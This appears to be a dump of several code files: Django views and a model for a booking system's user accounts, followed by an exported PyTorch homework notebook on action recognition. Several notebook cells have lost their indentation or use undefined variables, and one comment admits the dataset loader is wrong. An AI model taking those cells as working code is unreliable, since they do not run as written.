        context['menu_grant'] = get_user_grant_list(self.request.user.id, "BOOKING-SYSTEM")
        context['page_tab'] = 3
        return context
    def form_invalid(self, form):  # page shown again when validation fails
        response = super().form_invalid(form)
        return response
    def form_valid(self, form):
        # Persist the extra profile fields alongside the User fields.
        # IMPROVEMENT: the original issued three separate UPDATE queries;
        # a single .update() call writes all three columns in one query.
        user_profile = UserProfile.objects.filter(user_id=self.kwargs['pk'])
        user_profile.update(telephone=form.data['telephone'],
                            staff_role=form.data['role'],
                            email_group_id=form.data['email_group'])
        return super(SlotUserProfileUpdateView, self).form_valid(form)
    def get_success_url(self):
        # Back to the profile detail page after a successful save.
        return reverse_lazy("users:slot_user_profile", kwargs={'pk': self.object.pk})
# 更新 SLOT 的用户密码
class ChangeSlotUserPwdView(View):
    """Change a SLOT-system user's password.

    A manager (staff_role == 3) may reset another user's password without
    the old one; a user changing their own password must supply it.
    """
    def get(self, request, pk, ):
        user = User.objects.get(id=pk)
        parameter = {'user': user,
                     "page_tab": 3,
                     'menu_grant': get_user_grant_list(
                         request.user.id, "BOOKING-SYSTEM"),
                     }
        return render(request, "slot_user_change_password.html", parameter)
        # return render(request, "slot_user_change_password.html", change_pwd_get(request, pk, 1))
    def post(self, request, pk):
        username = request.POST.get("username", "")
        old_password = request.POST.get("old_password", "")
        password = request.POST.get("password", "")
        re_password = request.POST.get("re_password", "")
        # Managers resetting someone else skip old-password verification;
        # everyone else must authenticate with the old password first.
        if request.user.profile.staff_role == 3 and request.user.username != username:
            user = User.objects.filter(username__exact=username)[0]
        else:
            user = auth.authenticate(username=request.user.username, password=old_password)
        if user is not None and user.is_active:
            new_password = request.POST.get("password", "")
            change_pwd_form = ModifyPwdForm(request.POST)
            if change_pwd_form.is_valid():
                user.set_password(new_password)
                user.save()
                # Changing one's own password forces a re-login; a manager
                # editing someone else returns to that user's edit page.
                if request.user.username == username:
                    return redirect("users:login")
                else:
                    return redirect("users:slot_user_update", pk=user.id)
            else:
                return render(request, 'slot_user_change_password.html', {"message": "",
                                                                          'old_password': old_password,
                                                                          'password': password,
                                                                          're_password': re_password,
                                                                          'change_pwd_form': change_pwd_form,
                                                                          'user': user,
                                                                          "page_tab": 3,
                                                                          'menu_grant': get_user_grant_list(
                                                                              request.user.id, "BOOKING-SYSTEM"),
                                                                          })
        else:
            user = User.objects.filter(id=request.user.id)[0]
            return render(request, 'slot_user_change_password.html', {"message": "Old password is wrong. Try again",
                                                                      'old_password': old_password,
                                                                      'password': password,
                                                                      're_password': re_password,
                                                                      'user': user,
                                                                      "page_tab": 3,
                                                                      'menu_grant': get_user_grant_list(
                                                                          request.user.id, "BOOKING-SYSTEM"),
                                                                      })
# Create a new SLOT user.
class SlotAddUserView(View):
    """Create a SLOT user: one auth_user row plus its users_userprofile row."""

    def get(self, request):
        # Email group id 1 is reserved; offer only groups for the
        # operator position of the logged-in user.
        all_email_group = SlotEmailGroup.objects.filter(~Q(id=1), position__exact=request.user.profile.op_position)
        return render(request, "slot_add_user_profile.html", {"page_tab": 3,
                      'menu_grant': get_user_grant_list(
                          request.user.id, "BOOKING-SYSTEM"),
                      "all_email_group": all_email_group,
                      })

    def post(self, request):
        user_form = SlotUserForm(request.POST)
        all_email_group = SlotEmailGroup.objects.filter(~Q(id=1), position__exact=request.user.profile.op_position)
        if not user_form.is_valid():
            return render(request, "slot_add_user_profile.html", {'user_form': user_form,
                          "page_tab": 3,
                          'menu_grant': get_user_grant_list(request.user.id,
                                                            "BOOKING-SYSTEM"),
                          'all_email_group': all_email_group,
                          })
        # Collect the submitted values. auth_user defaults:
        # is_staff=0 (not staff), is_active from the form, is_superuser=0.
        email = request.POST.get("email", "")
        username = request.POST.get('username')
        first_name = request.POST.get('first_name')
        last_name = request.POST.get('last_name')
        telephone = request.POST.get('telephone', 0)
        email_group = request.POST.get('email_group')
        role = request.POST.get('role')
        status = request.POST.get('status', 0)
        # System-permission placeholder; access is actually controlled by
        # the manager role. The system checks from the second digit on.
        permission = "11111111111111111"
        # Profile defaults.
        uk_percent = 0
        uk_fix_amount = 0
        euro_percent = 0
        euro_fix_amount = 0
        fav_company = 1  # default favourite company: 1 - PARCEL FORCE
        # FIX: the original wrapped the two inserts in two separate atomic
        # blocks, so a failure creating the profile left an orphaned
        # auth_user row. Both inserts now commit (or roll back) together.
        # Also use the object returned by create() instead of re-querying.
        with transaction.atomic():
            user = User.objects.create(username=username,
                                       email=email,
                                       first_name=first_name,
                                       last_name=last_name,
                                       is_staff=0,
                                       is_active=status,
                                       is_superuser=0,
                                       last_login=timezone.now(),
                                       date_joined=timezone.now(),
                                       )
            # Hash and store the password for active accounts.
            if user.is_active:
                user.set_password(request.POST.get('password'))
                user.save()
            # Extra profile data: users_userprofile.
            UserProfile.objects.create(user_id=user.id,
                                       telephone=telephone,
                                       mod_date=datetime.datetime.now(),
                                       email_group_id=email_group,
                                       staff_role=role,
                                       favorite_company_id=fav_company,
                                       euro_fix_amount=euro_fix_amount,
                                       euro_percent=euro_percent,
                                       uk_fix_amount=uk_fix_amount,
                                       uk_percent=uk_percent,
                                       op_position=request.user.profile.op_position,
                                       menu_grant=permission,
                                       system_menu='SLOT',
                                       )
        return HttpResponseRedirect(reverse('slot:slot_user_list'))
|
996,869 | c6dce336c8ea75fabfab3eb538b8232e7ed789f3 | from django.db import models
from django.contrib.auth.models import User
class Profile(models.Model):
    """Extra per-user data attached one-to-one to Django's auth User."""
    # NOTE(review): related_name is plural ('profiles') although this is a
    # one-to-one relation -- callers may rely on it, confirm before renaming.
    user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='profiles')
    # Free-text country name; optional (blank and null allowed).
    country = models.CharField(max_length=250, blank=True, null=True)
    # Birthday; required (no blank/null), so forms must always supply it.
    b_day = models.DateField()
|
996,870 | b951349dd94a0d15dacfe36c9cc7f8e744fbfaee | #!/usr/bin/env python
# coding: utf-8
# # Training a ConvNet PyTorch
#
# In this notebook, you'll learn how to use the powerful PyTorch framework to specify a conv net architecture and train it on the human action recognition dataset.
#
# In[30]:
#ip install -r requirements.txt
# In[1]:
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from torch.utils.data import DataLoader,sampler,Dataset
import torchvision.datasets as dset
import torchvision.transforms as T
import timeit
from PIL import Image
import os
import numpy as np
import scipy.io
import torchvision.models.inception as inception
import csv
import pandas as pd
# ## What's this PyTorch business?
#
# * When using a framework like PyTorch or TensorFlow you can harness the power of the GPU for your own custom neural network architectures without having to write CUDA code directly.
# * this notebook will walk you through much of what you need to do to train models using pytorch. if you want to learn more or need further clarification on topics that aren't fully explained here, here are 2 good Pytorch tutorials. 1): http://pytorch.org/tutorials/beginner/deep_learning_60min_blitz.html 2)http://pytorch.org/tutorials/beginner/pytorch_with_examples.html
# * It's not necessary to have a GPU for this homework, using a GPU can make your code run faster.
#
# ## Load Datasets
#
# In this part, we will load the action recognition dataset for the neural network. In order to load data from our custom dataset, we need to write a custom Dataloader. If you put q3_2_data.mat, /valClips,/trainClips,/testClips under the folder of ./data/ , you do not need to change anything in this part.
# First, load the labels of the dataset, you should write your path of the q3_2_data.mat file.
# In[18]:
label_mat=scipy.io.loadmat('./data/q3_2_data.mat')
label_train=label_mat['trLb']
print(len(label_train))
label_val=label_mat['valLb']
print(len(label_val))
# In[2]:
df = pd.read_csv('/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/train.csv')
vlabel_train=df['Label']
vlabel_train
# In[37]:
# FIX: the original cell read `vlabel_train[]` -- an empty subscript is a
# SyntaxError. A full slice preserves the apparent "take the labels" intent.
ASLabel = vlabel_train[:]
ASLabel
# In[48]:
vtrainclips=df.FileName
vtrainclips
# In[24]:
label_train
# In[41]:
label
# ### Dataset class
#
# torch.utils.data.Dataset is an abstract class representing a dataset. The custom dataset should inherit Dataset and override the following methods:
#
# __len__ so that len(dataset) returns the size of the dataset.
# __getitem__ to support the indexing such that dataset[i] can be used to get ith sample
#
# Let’s create a dataset class for our action recognition dataset. We will read images in __getitem__. This is memory efficient because all the images are not stored in the memory at once but read as required.
#
# Sample of our dataset will be a dict {'image':image,'img_path':img_path,'Label':Label}. Our datset will take an optional argument transform so that any required processing can be applied on the sample.
# In[3]:
class ActionDataset(Dataset):
    """Action recognition dataset.

    Each numbered sub-folder of *root_dir* holds 3 frames named
    '1.jpg'..'3.jpg'; index ``idx`` maps to frame ``idx % 3 + 1`` of clip
    folder ``idx // 3 + 1``.
    """

    def __init__(self, root_dir, labels=[], transform=None):
        """
        Args:
            root_dir (string): Directory with all the images.
            labels (list): labels of images (empty for unlabeled test data).
            transform (callable, optional): Optional transform applied to a sample.
        """
        self.root_dir = root_dir
        self.transform = transform
        # One entry per clip folder directly under root_dir.
        self.length = len(os.listdir(self.root_dir))
        self.labels = labels

    def __len__(self):
        # 3 frames per clip folder.
        return self.length * 3

    def __getitem__(self, idx):
        # FIX: the original used '/' (true division). Under Python 3 that
        # yields a float, so str(folder) became e.g. '1.0' (bad path) and
        # self.labels[idx/3] raised TypeError. Integer division is intended.
        folder = str(idx // 3 + 1)
        imgname = str(idx % 3 + 1) + '.jpg'
        img_path = os.path.join(self.root_dir, folder, imgname)
        image = Image.open(img_path)
        if len(self.labels) != 0:
            # Labels in the .mat file are 1-based; shift to 0-based.
            Label = self.labels[idx // 3][0] - 1
        if self.transform:
            image = self.transform(image)
        if len(self.labels) != 0:
            sample = {'image': image, 'img_path': img_path, 'Label': Label}
        else:
            sample = {'image': image, 'img_path': img_path}
        return sample
# In[5]:
# image_dataset=ActionDataset(root_dir='/home/adewopva/Downloads/CNN_AR/CNN-Action-Recognition-master/data/trainClips/',\
# labels=label_train,transform=T.ToTensor())
# #iterating though the dataset
# for i in range(10):
# sample=image_dataset[i]
# print(sample['image'].shape)
# print(sample['Label'])
# print(sample['img_path'])
# In[1]:
'''
For the given path, get the List of all files in the directory tree
'''
def getListOfFiles(dirName):
    """Return every file path in the directory tree rooted at *dirName*.

    Directories are descended into recursively; only file paths are
    returned (never directory paths).
    """
    collected = []
    for entry in os.listdir(dirName):
        full_path = os.path.join(dirName, entry)
        if os.path.isdir(full_path):
            # Recurse into sub-directories and merge their files.
            collected.extend(getListOfFiles(full_path))
        else:
            collected.append(full_path)
    return collected
# In[7]:
data_dir_list
# In[77]:
import os
def listdirs(rootdir):
    """Print every directory under *rootdir*, depth-first.

    Prints each directory path as it is discovered, then recurses into
    it. Returns None.
    """
    for entry in os.listdir(rootdir):
        candidate = os.path.join(rootdir, entry)
        if os.path.isdir(candidate):
            print(candidate)
            listdirs(candidate)
rootdir ='/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/'
listdirs(rootdir)
# In[14]:
# In[16]:
#V Current as of 2am 1/26
class ActionDataset(Dataset):
"""Action dataset."""
def __init__(self, root_dir,labels=[], transform=None):
"""
Args:
root_dir (string): Directory with all the images.
labels(list): labels if images.
transform (callable, optional): Optional transform to be applied on a sample.
"""
self.root_dir = root_dir
self.transform = transform
self.length=len(os.listdir(self.root_dir))
self.labels=labels
def __len__(self):
return self.length*5
def __getitem__(self, idx):
root=self.root_dir
#we shall store all the file names in this list
img_path1=[]
for path, subdirs, files in os.walk(root):
for name in files:
img_path1.append(os.path.join(path, name))
#print all the file names
for var in img_path1:
if var.endswith(".jpg"):
img_path=var
image = Image.open(img_path)
if len(self.labels)!=0:
#your_path = img/path1
label1 = img_path.split(os.sep)
labels_name={'on_feet':0, 'active':1, 'rest':2, 'escape':3, 'crawling':4}
label2=label1[10]
Label=labels_name[label2]
if self.transform:
image = self.transform(image)
if len(self.labels)!=0:
sample={'image':image,'img_path':img_path,'Label':Label}
else:
sample={'image':image,'img_path':img_path}
#print(sample)
return sample
image_dataset=ActionDataset(root_dir=r'/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/', labels=vlabel_train,transform=T.ToTensor())
#iterating though the dataset
for i in range(4):
sample1=image_dataset[i]
print(sample1['image'].shape)
print(sample1['Label'])
print(sample1['img_path'])
# In[17]:
#V Current as of 2am 1/26
class ActionDataset(Dataset):
"""Action dataset."""
def __init__(self, root_dir,labels=[], transform=None):
"""
Args:
root_dir (string): Directory with all the images.
labels(list): labels if images.
transform (callable, optional): Optional transform to be applied on a sample.
"""
self.root_dir = root_dir
self.transform = transform
self.length=len(os.listdir(self.root_dir))
self.labels=labels
def __len__(self):
return self.length*5
def __getitem__(self, root):
root=self.root_dir
#we shall store all the file names in this list
#img_path1=[]
for path, subdirs, files in os.walk(root):
for name in files:
img_path1=(os.path.join(path, name))
if img_path1.endswith(".jpg"):
#img_path=var
image = Image.open(img_path1)
#your_path = img/path1
label1 = img_path1.split(os.sep)
labels_name={'on_feet':0, 'active':1, 'rest':2, 'escape':3, 'crawling':4}
label2=label1[10]
Label=labels_name[label2]
if self.transform:
image = self.transform(image)
if len(self.labels)!=0:
sample={'image':image,'img_path':img_path1,'Label':Label}
else:
sample={'image':image,'img_path':img_path1}
#print(sample)
return sample
#break
image_dataset=ActionDataset(root_dir=r'/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/', labels=vlabel_train,transform=T.ToTensor())
#iterating though the dataset
for i in range (5):
sample1=image_dataset[i]
print(sample1['image'].shape)
print(sample1['Label'])
print(sample1['img_path'])
# In[ ]:
# HERE IS THE PROBLEM: the output is just a single image, not different images.
# In[22]:
# Working Full Code for video with single action and Multiple actions
import os, sys
import pandas as pd
directory = r'/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/'
input_base = []
for filename in os.listdir(directory):
if filename.endswith(".csv"):
os.path.splitext(filename)
filename = os.path.splitext(filename)[0]
# In[5]:
import os
#img_path1=[]
for path, subdirs, files in os.walk(r'/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/'):
for i in files:
print(os.path.join(path, i))
# In[11]:
#file=img_path.splitext(filename)
# FIX: the original cell had an empty subscript (SyntaxError). splitext
# returns (root, ext); take the root, as the earlier In[22] cell does.
filename = os.path.splitext(img_path)[0]
filename
# In[9]:
print(len(img_path1))
# In[5]:
print(len(img_path1))
# In[6]:
# #!/usr/bin/python
# # -*- coding: utf-8 -*-
# class ActionDataset(Dataset):
# """Action dataset."""
# def __init__(
# self,
# root_dir,
# labels=[],
# transform=None,
# ):
# """
# Args:
# root_dir (string): Directory with all the images.
# labels(list): labels if images.
# transform (callable, optional): Optional transform to be applied on a sample.
# """
# self.root_dir = root_dir
# self.transform = transform
# self.length = len(os.listdir(self.root_dir))
# self.labels = labels
# def __len__(self):
# return self.length * 3
# def __getitem__(self, idx):
# root = self.root_dir
# # we shall store all the file names in this list
# img_path1 = []
# for (root, dirs, files) in os.walk(root):
# for file in files:
# # append the file name to the list
# img_path1.append(os.path.join(root, file))
# return img_path1
# # print all the file names
# for name in img_path1:
# img_path = name
# image = Image.open(img_path)
# # your_path = imgpath1
# label1 = img_path.split(os.sep)
# labels_name = {
# 'on_feet': 0,
# 'active': 1,
# 'rest': 2,
# 'escape': 3,
# 'crawling': 4,
# }
# label2 = label1[10]
# Label = labels_name[label2]
# if self.transform:
# image = self.transform(image)
# if len(self.labels) != 0:
# sample = {'image': image, 'img_path': img_path,
# 'Label': Label}
# else:
# sample = {'image': image, 'img_path': img_path}
# return sample
# image_dataset = ActionDataset(root_dir='/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/'
# , labels=vlabel_train, transform=T.ToTensor())
# # iterating though the dataset
# for i in range(10):
# sample1 = image_dataset[i]
# print (sample1['image'].shape)
# print (sample1['Label'])
# print (sample1['img_path'])
# In[19]:
image_dataset=ActionDataset(root_dir='/home/adewopva/OneDrive/Independent_Study/Dr.Nelly/7Curated_annotations/CNNAR/DATA/train/', labels=vlabel_train,transform=T.ToTensor())
#iterating though the dataset
for i in range(10):
sample=image_dataset[i]
print(sample['image'].shape)
print(sample['Label'])
print(sample['img_path'])
# We can iterate over the created dataset with a 'for' loop as before. However, we are losing a lot of features by using a simple for loop to iterate over the data. In particular, we are missing out on:
#
# * Batching the data
# * Shuffling the data
# * Load the data in parallel using multiprocessing workers.
#
# torch.utils.data.DataLoader is an iterator which provides all these features.
# Dataloaders for the training, validationg and testing set.
# In[38]:
image_dataset_train=ActionDataset(root_dir='./data/trainClips/',labels=label_train,transform=T.ToTensor())
image_dataloader_train = DataLoader(image_dataset_train, batch_size=32,
shuffle=True, num_workers=4)
image_dataset_val=ActionDataset(root_dir='./data/valClips/',labels=label_val,transform=T.ToTensor())
image_dataloader_val = DataLoader(image_dataset_val, batch_size=32,
shuffle=False, num_workers=4)
image_dataset_test=ActionDataset(root_dir='./data/testClips/',labels=[],transform=T.ToTensor())
image_dataloader_test = DataLoader(image_dataset_test, batch_size=32,
shuffle=False, num_workers=4)
# In[39]:
dtype = torch.FloatTensor # the CPU datatype
# Constant to control how frequently we print train loss
print_every = 100
# This is a little utility that we'll use to reset the model
# if we want to re-initialize all our parameters
def reset(m):
    """Re-initialize *m*'s parameters when the module supports it.

    Modules without a ``reset_parameters`` method are left untouched.
    Intended for use with ``model.apply(reset)``.
    """
    reset_fn = getattr(m, 'reset_parameters', None)
    if reset_fn is not None:
        reset_fn()
# ## Example Model
#
# ### Some assorted tidbits
#
# Let's start by looking at a simple model. First, note that PyTorch operates on Tensors, which are n-dimensional arrays functionally analogous to numpy's ndarrays, with the additional feature that they can be used for computations on GPUs.
#
# We'll provide you with a Flatten function, which we explain here. Remember that our image data (and more relevantly, our intermediate feature maps) are initially N x C x H x W, where:
# * N is the number of datapoints
# * C is the number of image channels.
# * H is the height of the intermediate feature map in pixels
# * W is the height of the intermediate feature map in pixels
#
# This is the right way to represent the data when we are doing something like a 2D convolution, that needs spatial understanding of where the intermediate features are relative to each other. When we input data into fully connected affine layers, however, we want each datapoint to be represented by a single vector -- it's no longer useful to segregate the different channels, rows, and columns of the data. So, we use a "Flatten" operation to collapse the C x H x W values per representation into a single long vector. The Flatten function below first reads in the N, C, H, and W values from a given batch of data, and then returns a "view" of that data. "View" is analogous to numpy's "reshape" method: it reshapes x's dimensions to be N x ??, where ?? is allowed to be anything (in this case, it will be C x H x W, but we don't need to specify that explicitly).
# In[40]:
class Flatten(nn.Module):
    """Collapse (N, C, H, W) feature maps into (N, C*H*W) row vectors."""

    def forward(self, x):
        # Unpack all four dimensions so non-4D inputs fail loudly,
        # exactly as the original did.
        batch, channels, height, width = x.size()
        return x.view(batch, -1)
# ### The example model itself
#
# The first step to training your own model is defining its architecture.
#
# Here's an example of a convolutional neural network defined in PyTorch -- try to understand what each line is doing, remembering that each layer is composed upon the previous layer. We haven't trained anything yet - that'll come next - for now, we want you to understand how everything gets set up. nn.Sequential is a container which applies each layer
# one after the other.
#
# In this example, you see 2D convolutional layers (Conv2d), ReLU activations, and fully-connected layers (Linear). You also see the Cross-Entropy loss function, and the Adam optimizer being used.
#
# Make sure you understand why the parameters of the Linear layer are 10092 and 10.
#
# In[9]:
# Here's where we define the architecture of the model...
simple_model = nn.Sequential(
nn.Conv2d(3, 32, kernel_size=7, stride=2),
nn.ReLU(inplace=True),
Flatten(), # see above for explanation
nn.Linear(10092, 10), # affine layer
)
# Set the type of all data in this model to be FloatTensor
simple_model.type(dtype)
loss_fn = nn.CrossEntropyLoss().type(dtype)
optimizer = optim.Adam(simple_model.parameters(), lr=1e-2) # lr sets the learning rate of the optimizer
# PyTorch supports many other layer types, loss functions, and optimizers - you will experiment with these next. Here's the official API documentation for these (if any of the parameters used above were unclear, this resource will also be helpful).
#
# * Layers: http://pytorch.org/docs/nn.html
# * Activations: http://pytorch.org/docs/nn.html#non-linear-activations
# * Loss functions: http://pytorch.org/docs/nn.html#loss-functions
# * Optimizers: http://pytorch.org/docs/optim.html#algorithms
# ## Training a specific model
#
# In this section, we're going to specify a model for you to construct. The goal here isn't to get good performance (that'll be next), but instead to get comfortable with understanding the PyTorch documentation and configuring your own model.
#
# Using the code provided above as guidance, and using the following PyTorch documentation, specify a model with the following architecture:
#
# * 7x7 Convolutional Layer with 8 filters and stride of 1
# * ReLU Activation Layer
# * 2x2 Max Pooling layer with a stride of 2
# * 7x7 Convolutional Layer with 16 filters and stride of 1
# * ReLU Activation Layer
# * 2x2 Max Pooling layer with a stride of 2
# * Flatten the feature map
# * ReLU Activation Layer
# * Affine layer to map input units to 10 outputs, you need to figure out the input size here.
#
# In[10]:
fixed_model_base = nn.Sequential(
#########1st To Do (10 points)###################
nn.Conv2d(3, 8, kernel_size=7, stride=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride = 2),
nn.Conv2d(8, 16, kernel_size=7, stride=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride = 2),
Flatten(),
nn.ReLU(inplace=True),
nn.Linear(1936, 10)
####################################
)
fixed_model = fixed_model_base.type(dtype)
# To make sure you're doing the right thing, use the following tool to check the dimensionality of your output (it should be 32 x 10, since our batches have size 32 and the output of the final affine layer should be 10, corresponding to our 10 classes):
# In[11]:
## Now we're going to feed a random batch into the model you defined and make sure the output is the right size
x = torch.randn(32, 3, 64, 64).type(dtype)
x_var = Variable(x.type(dtype)) # Construct a PyTorch Variable out of your input data
ans = fixed_model(x_var) # Feed it through the model!
# Check to make sure what comes out of your model
# is the right dimensionality... this should be True
# if you've done everything correctly
print(np.array(ans.size()))
np.array_equal(np.array(ans.size()), np.array([32, 10]))
# ### Train the model.
#
# Now that you've seen how to define a model and do a single forward pass of some data through it, let's walk through how you'd actually train one whole epoch over your training data (using the fixed_model_base we provided above).
#
# Make sure you understand how each PyTorch function used below corresponds to what you implemented in your custom neural network implementation.
#
# Note that because we are not resetting the weights anywhere below, if you run the cell multiple times, you are effectively training multiple epochs (so your performance should improve).
#
# First, set up an RMSprop optimizer (using a 1e-4 learning rate) and a cross-entropy loss function:
# In[31]:
################ 2nd To Do (5 points)##################
optimizer = torch.optim.RMSprop(fixed_model_base.parameters(), lr = 0.0001)
#optimizer = torch.optim.Adadelta(fixed_model_base.parameters(), lr = 0.001)
loss_fn = nn.CrossEntropyLoss()
#loss_fn = nn.MultiMarginLoss()
# In[37]:
# This sets the model in "training" mode.
# This is relevant for some layers that may have different behavior
# in training mode vs testing mode, such as Dropout and BatchNorm.
fixed_model.train()
# Load one batch at a time.
for t, sample in enumerate(image_dataloader_train):
x_var = Variable(sample['image'])
#print(type(x_var.data))
#print(x_var.shape)
y_var = Variable(sample['Label']).long()
# This is the forward pass: predict the scores for each class, for each x in the batch.
scores = fixed_model(x_var)
# Use the correct y values and the predicted y values to compute the loss.
loss = loss_fn(scores, y_var)
if (t + 1) % print_every == 0:
print('t = %d, loss = %.4f' % (t + 1, loss.data[0]))
# Zero out all of the gradients for the variables which the optimizer will update.
optimizer.zero_grad()
# This is the backwards pass: compute the gradient of the loss with respect to each
# parameter of the model.
loss.backward()
# Actually update the parameters of the model using the gradients computed by the backwards pass.
optimizer.step()
# Now you've seen how the training process works in PyTorch. To save you writing boilerplate code, we're providing the following helper functions to help you train for multiple epochs and check the accuracy of your model:
# In[41]:
def train(model, loss_fn, optimizer, dataloader, num_epochs = 1):
    """Run *num_epochs* of SGD-style training over *dataloader*.

    Before each epoch the validation accuracy of the module-level
    ``fixed_model`` is reported; training loss is printed every
    ``print_every`` batches.
    """
    for epoch in range(num_epochs):
        print('Starting epoch %d / %d' % (epoch + 1, num_epochs))
        # Progress report on the validation set (module-level globals).
        check_accuracy(fixed_model, image_dataloader_val)
        model.train()
        for step, batch in enumerate(dataloader, start=1):
            inputs = Variable(batch['image'])
            targets = Variable(batch['Label'].long())
            loss = loss_fn(model(inputs), targets)
            if step % print_every == 0:
                print('t = %d, loss = %.4f' % (step, loss.data[0]))
            # Backward pass and parameter update.
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
def check_accuracy(model, loader):
    """Print *model*'s classification accuracy over *loader*.

    Puts the model in eval mode, counts argmax matches against the
    'Label' field of each batch dict, and prints the tally. Returns None.
    """
    model.eval()  # opposite of model.train(); affects Dropout/BatchNorm
    correct = 0
    total = 0
    for batch in loader:
        images = Variable(batch['image'])
        labels = batch['Label']
        scores = model(images)
        # Predicted class = argmax over the class dimension.
        _, predicted = scores.data.max(1)
        correct += (predicted.numpy() == labels.numpy()).sum()
        total += predicted.size(0)
    accuracy = float(correct) / total
    print('Got %d / %d correct (%.2f)' % (correct, total, 100 * accuracy))
# ### Check the accuracy of the model.
#
# Let's see the train and check_accuracy code in action -- feel free to use these methods when evaluating the models you develop below.
#
# You should get a training loss of around 1.0-1.2, and a validation accuracy of around 50-60%. As mentioned above, if you re-run the cells, you'll be training more epochs, so your performance will improve past these numbers.
#
# But don't worry about getting these numbers better -- this was just practice before you tackle designing your own model.
# In[39]:
torch.random.manual_seed(54321)
fixed_model.cpu()
fixed_model.apply(reset)
fixed_model.train()
train(fixed_model, loss_fn, optimizer,image_dataloader_train, num_epochs=4)
check_accuracy(fixed_model, image_dataloader_train)# check accuracy on the training set
# ### Don't forget the validation set!
#
# And note that you can use the check_accuracy function to evaluate on the validation set, by passing **image_dataloader_val** as the second argument to check_accuracy. The accuracy on validation set is arround 40-50%.
# In[40]:
check_accuracy(fixed_model, image_dataloader_val)#check accuracy on the validation set
# ##### Train a better model for action recognition!
#
# Now it's your job to experiment with architectures, hyperparameters, loss functions, and optimizers to train a model that achieves better accuracy on the action recognition **validation** set. You can use the check_accuracy and train functions from above.
# In[42]:
###########3rd To Do (16 points, must submit the results to Kaggle) ##############
# Train your model here, and make sure the output of this cell is the accuracy of your best model on the
# train, val, and test sets. Here's some code to get you started. The output of this cell should be the training
# and validation accuracy on your best model (measured by validation accuracy).
fixed_model_base = nn.Sequential(
nn.Conv2d(3, 200, kernel_size=10, stride=3),
nn.ReLU(inplace=True),
nn.MaxPool2d(3, stride = 1),
nn.BatchNorm2d(200),
nn.Dropout2d(0.1),
nn.Conv2d(200, 100, kernel_size=5, stride=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(3, stride = 1),
nn.BatchNorm2d(100),
nn.Dropout2d(0.2),
nn.Conv2d(100, 50, kernel_size=3, stride=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=1),
nn.BatchNorm2d(50),
Flatten(),
nn.Linear(200, 100),
nn.Linear(100, 50),
nn.Linear(50, 10),
nn.LogSoftmax()
####################################
)
fixed_model = fixed_model_base.type(dtype)
optimizer = torch.optim.RMSprop(fixed_model_base.parameters(), lr = 0.0001)
#optimizer = torch.optim.Adadelta(fixed_model_base.parameters(), lr = 0.001)
loss_fn = nn.CrossEntropyLoss()
# ### Describe what you did
#
# In the cell below you should write an explanation of what you did, any additional features that you implemented, and any visualizations or graphs that you make in the process of training and evaluating your network.
# ### Tell us here!
# ########### 4th To Do (4 points) ##############
# * 10X10 Convolution layer with 200 filters with stride 3
# * ReLU layer
# * Max Pool layer with window size 3X3 with stride 1
# * Batch Norm layer with input size 200
# * Dropout layer with penalty 0.1
# * 5X5 Convolution layer with 100 filters with stride 2
# * ReLU layer
# * Max Pool layer with window size 3X3 with stride 1
# * Batch Norm layer with input size 100
# * Dropout layer with penalty 0.2
# * 3X3 Convolution layer with 50 filters and stride 1
# * ReLU layer
# * Max Pool layer with window size 2 and stride 1
# * Batch Norm layer with input size 50
# * Flatten
# * affine layer to reduce inputs from 200 to 100
# * affine layer to reduce inputs from 100 to 50
# * affine layer to reduce inputs from 50 to 10
# * logsoftmaxing layer
# ### Testing the model and submit on Kaggle
# Testing the model on the testing set and save the results as a .csv file.
# Please submitted the results.csv file generated by predict_on_test() to Kaggle(https://www.kaggle.com/c/cse512springhw3) to see how well your network performs on the test set.
# #######5th To Do (submit the result to Kaggle,the highest 3 entries get extra 10 points )###############
#
# * Rank: 10
# * Score: 70.34658
# In[ ]:
# In[43]:
## Now we're going to feed a random batch into the model you defined and make sure the output is the right size
x = torch.randn(32, 3, 64, 64).type(dtype)
x_var = Variable(x.type(dtype)) # Construct a PyTorch Variable out of your input data
ans = fixed_model(x_var) # Feed it through the model!
# Check to make sure what comes out of your model
# is the right dimensionality... this should be True
# if you've done everything correctly
print(np.array(ans.size()))
np.array_equal(np.array(ans.size()), np.array([32, 10]))
# In[78]:
torch.random.manual_seed(54321)
fixed_model.cpu()
fixed_model.apply(reset)
fixed_model.train()
train(fixed_model, loss_fn, optimizer,image_dataloader_train, num_epochs=12)
check_accuracy(fixed_model, image_dataloader_train)# check accuracy on the training set
# In[79]:
check_accuracy(fixed_model, image_dataloader_val)# check accuracy on the training set
# ### Things you should try:
# - **Filter size**: Above we used 7x7; this makes pretty pictures but smaller filters may be more efficient
# - **Number of filters**: Do more or fewer do better?
# - **Pooling vs Strided Convolution**: Do you use max pooling or just stride convolutions?
# - **Batch normalization**: Try adding spatial batch normalization after convolution layers and vanilla batch normalization after affine layers. Do your networks train faster?
# - **Network architecture**: The network above has two layers of trainable parameters. Can you do better with a deep network? Good architectures to try include:
# - [conv-relu-pool]xN -> [affine]xM -> [softmax or SVM]
# - [conv-relu-conv-relu-pool]xN -> [affine]xM -> [softmax or SVM]
# - [batchnorm-relu-conv]xN -> [affine]xM -> [softmax or SVM]
# - **Global Average Pooling**: Instead of flattening and then having multiple affine layers, perform convolutions until your image gets small (7x7 or so) and then perform an average pooling operation to get to a 1x1 image picture (1, 1 , Filter#), which is then reshaped into a (Filter#) vector. This is used in [Google's Inception Network](https://arxiv.org/abs/1512.00567) (See Table 1 for their architecture).
# - **Regularization**: Add l2 weight regularization, or perhaps use Dropout.
#
# ### Tips for training
